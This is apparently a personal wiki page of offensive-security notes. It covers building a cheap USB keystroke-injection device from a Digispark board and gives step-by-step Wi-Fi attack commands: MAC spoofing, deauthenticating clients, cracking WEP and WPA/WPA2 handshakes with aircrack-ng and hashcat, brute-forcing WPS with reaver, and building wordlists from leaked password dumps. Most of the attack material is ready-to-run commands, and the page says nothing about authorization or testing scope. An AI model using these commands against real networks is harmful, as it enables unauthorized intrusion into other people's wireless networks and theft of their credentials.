Skip to main content

Offensive

Rubber Ducky

Screw the $45~ thing, we're making our own for $1.15~.

https://hackernoon.com/low-cost-usb-rubber-ducky-pen-test-tool-for-3-using-digispark-and-duck2spark-5d59afc1910

https://github.com/PlatyPew/Digispark-Duckduino

https://github.com/mame82/duck2spark

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Open Arduino IDE; File -> Preferences -> Additional Boards Manager URLs http://digistump.com/package_digistump_index.json

Tools -> Board -> Boards Manager -> Digistump AVR Boards - install it.


# cat > /etc/udev/rules.d/49-micronucleus.rules << EOF
SUBSYSTEMS=="usb", ATTRS{idVendor}=="16d0", ATTRS{idProduct}=="0753", MODE:="0666"
KERNEL=="ttyACM*", ATTRS{idVendor}=="16d0", ATTRS{idProduct}=="0753", MODE:="0666", ENV{ID_MM_DEVICE_IGNORE}="1"
EOF

reboot

You can now flash stuff to the board by selecting it as 'Digispark Default 16.5mhz'.

Do not plug the board before compiling process, do it after when you'll be prompted.


## This seems not needed anymore as the AVR package ships up to date micronucleus, and the project stopped providing precompiled linux library?
#git clone https://github.com/micronucleus/micronucleus.git
#cp ~/micronucleus/commandline/micronucleus /home/c0rn3j/.arduino15/packages/digistump/tools/micronucleus

General

http://tools.kali.org/tools-listing

Hashcat

##Hashcat Hashcat is a tool to crack various hashes, passwords and other formats. Hashcat is now merged into one OpenCL version(used to have a CUDA version for nvidia GPUs- CudaHashcat, the new hashcat only supports OpenCL).

For WPA2 it uses a new(2017) format called hccapx.

##Attacking

Attacking 802.11

1[1] 2[2] 3[3]

http://tools.kali.org/wireless-attacks/mdk3

Preparation:

Packages: aircrack-ng wireshark-qt macchanger reaver-wps-fork-t6x


Kill your network manager service to avoid it interfering.

I am using NetworkManager.

sudo systemctl stop NetworkManager - sometimes it starts again so just try this twice...

Then use sudo airmon-ng to find out your interface name for the wireless card you want to use. If it is not listed, you are either lacking drivers or it is not compatible.

After finding out your interface name, turn your WLAN card into monitor mode with sudo airmon-ng start yourInterface, you will then have a _yourInterface_mon interface you can use. You can use the –verbose flag with the command to diagnose possible issues if it is not working as intended. You can use stop instead of start to make the interface go back to managed mode and use wi-fi as usual.

Since the default interface tends to be wlp8s0, that is what I am going to use for this page.


Change your MAC:

macchanger -r wlp8s0 - randomize MAC address completely. Alternatively use -m option and supply an address starting with 68:5D:43 or any other vendor specific address, as some routers and networks will not allow MAC that is not assigned to any vendor. (MAC is in this format XX:XX:XX:YY:YY:YY where XXXXXX is vendor specific and YYYYYY is random)

Wifite

There is a script called wifite that can do most of these attacks even if the attacker doesn't understand them. It fails in some more complicated cases.

git clone https://github.com/derv82/wifite

cd wifite/

sudo python2.7 ./wifite.py

Scan your surroundings

sudo airodump-ng wlp8s0mon

MAC address filtering

Use airodump to look for an active client and change your MAC address to theirs.

Hidden SSID

aireplay-ng -0 0 -a 00:1F:1F:1F:1F:1F -c 00:1F:1F:1F:1F:1F --ignore-negative-one wlp8s0mon

while running airodump. Successfully deauthing a client will make them broadcast the SSID in the clear because they'll have to reconnect.

WEP

airmon-ng start wlp8s0

airodump-ng wlp8s0mon

airodump-ng -w wep -c CHANNEL --bssid BSSID wlp8s0mon

aireplay-ng -1 0 -a BSSID wlp8s0mon

aireplay-ng -3 -b BSSID wlp8s0mon

aircrack-ng filename.cap

WPA/WPA2-PSK

airmon-ng start wlp8s0

airodump-ng wlp8s0mon

airodump-ng -c CHANNEL -w filename --bssid BSSID wlp8s0mon

aireplay-ng -0 0 -a BSSID wlp8s0mon

After obtaining 4-way handshake:

aircrack-ng –w WORDLIST -b BSSID filename.cap

WPA2-MGT MSCHAPv2

http://pastebin.com/CnJstqpH

WPS

Scan for WPS enabled APs

sudo wash -i wlp8s0mon

For Bruteforcing and logging for possible pixie attack. Use -K 1 parameter to try pixiewps while reaver is running. The plain bruteforce attack might take minutes to days, but usually it's max 10 hours.

sudo reaver -i wlp8s0mon -b BSSID -c channel -f -S -vvv -H

After obtaining at least one response you can use pixiewps to try the offline pixie attack. Whole pixiewps command will be saved in a text file if you supplied the -H command. Pixie attack takes anywhere from a second to 30 minutes, and only works if the router is vulnerable to it.

Cracking a handshake/capture file

Using GPU

Converting .cap to .hccapx

Use cap2hccapx (from the hashcat-utils package)

cap2hccapx capture.cap capture.hccapx

HCCAP to password

hashcat -m 2500 -w 1 filename.hccapx wordlist.txt

Using CPU

IVS file crack aircrack-ng -a2 -b F8:8E:88:AA:FF:BB -w wordlist-final.txt ivsfile.ivs

Other stuff

Find out default gateway route -n

Obtaining wordlists

hashes.org have awesome leaked lists, so I'm going with a bunch these. You can find different lists on torrent trackers.

7z x xxx_found.7z -owordlists - extract file into a folder called 'wordlists'

cat xxx_found_sorted.txt xxx_found_sorted.txt xxx_found_sorted.txt > mywordlist.txt - join all lists into one

sed -r '/^.{,7}$/d' mywordlist.txt > WPAwordlist.txt - remove everything that is 7 characters or less from the file and write that to a new file. WPA/2 does not accept less than 8 characters.

sort -T ~ -u WPAwordlist.txt > WPAwordlist_sorted.txt - change temporary directory to the home directory(sort would fail on a big file if /tmp is too small) and sort into a new file